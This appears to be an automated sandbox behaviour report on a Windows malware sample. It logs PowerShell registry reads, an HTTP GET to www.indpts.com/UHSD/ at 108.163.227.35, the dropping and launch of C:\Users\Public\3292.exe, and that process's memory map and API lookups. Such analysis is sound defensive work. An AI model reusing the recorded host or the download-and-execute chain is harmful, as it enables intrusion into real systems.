Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Users\Public\3292.exe show_window = SW_SHOWNORMAL True 1
Fn
Module (3)
+
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
System (8)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System False 6
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Mutex (24)
+
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Create mutex_name = Global\.net clr networking True 5
Fn
Release - True 1
Fn
Release mutex_name = Global\.net clr networking True 2
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (100)
+
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 91
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = PubLic, result_out = C:\Users\Public True 2
Fn
Get Environment String name = PubLIC, result_out = C:\Users\Public True 2
Fn
Get Environment String name = public, result_out = C:\Users\Public True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (1)
+
Operation Additional Information Success Count Logfile
Resolve Name host = www.indpts.com, address_out = 108.163.227.35 True 1
Fn
TCP Sessions (1)
+
Information Value
Total Data Sent 0.07 KB (69 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts 108.163.227.35:80
TCP Session #1
+
Information Value
Handle 0x4dc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 108.163.227.35
Remote Port 80
Local Address 0.0.0.0
Local Port 2496
Data Sent 0.07 KB (69 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 108.163.227.35, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 69, size_out = 69 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (1)
+
Information Value
Total Data Sent 0.07 KB (69 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts www.indpts.com
HTTP Session #1
+
Information Value
Server Name www.indpts.com
Server Port 80
Data Sent 0.07 KB (69 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = www.indpts.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /UHSD/ True 1
Fn
Send HTTP Request headers = host: www.indpts.com, connection: Keep-Alive, url = www.indpts.com/UHSD/ True 1
Fn
Data
Close Session - True 1
Fn
Process #4: 3292.exe
(Host: 59, Network: 0)
+
Information Value
ID #4
File Name c:\users\public\3292.exe
Command Line "C:\Users\Public\3292.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:28, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:55
OS Process Information
+
Information Value
PID 0xb2c
Parent PID 0xaec (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B30
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True True False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True True False
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000270000 0x00270000 0x0034efff Pagefile Backed Memory Readable True False False
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True True False
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True True False
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True True False
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True True False
sortdefault.nls 0x021e0000 0x024aefff Memory Mapped File Readable False False False
private_0x00000000024b0000 0x024b0000 0x026cffff Private Memory Readable, Writable True True False
private_0x00000000026d0000 0x026d0000 0x02aa0fff Private Memory Readable, Writable True True False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
Module (39)
+
Operation Module Additional Information Success Count Logfile
Load msvcrt.dll base_address = 0x752a0000 True 1
Fn
Load KERNEL32.dll base_address = 0x759f0000 True 1
Fn
Load USER32.dll base_address = 0x75790000 True 1
Fn
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f884 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f8bc True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Fn
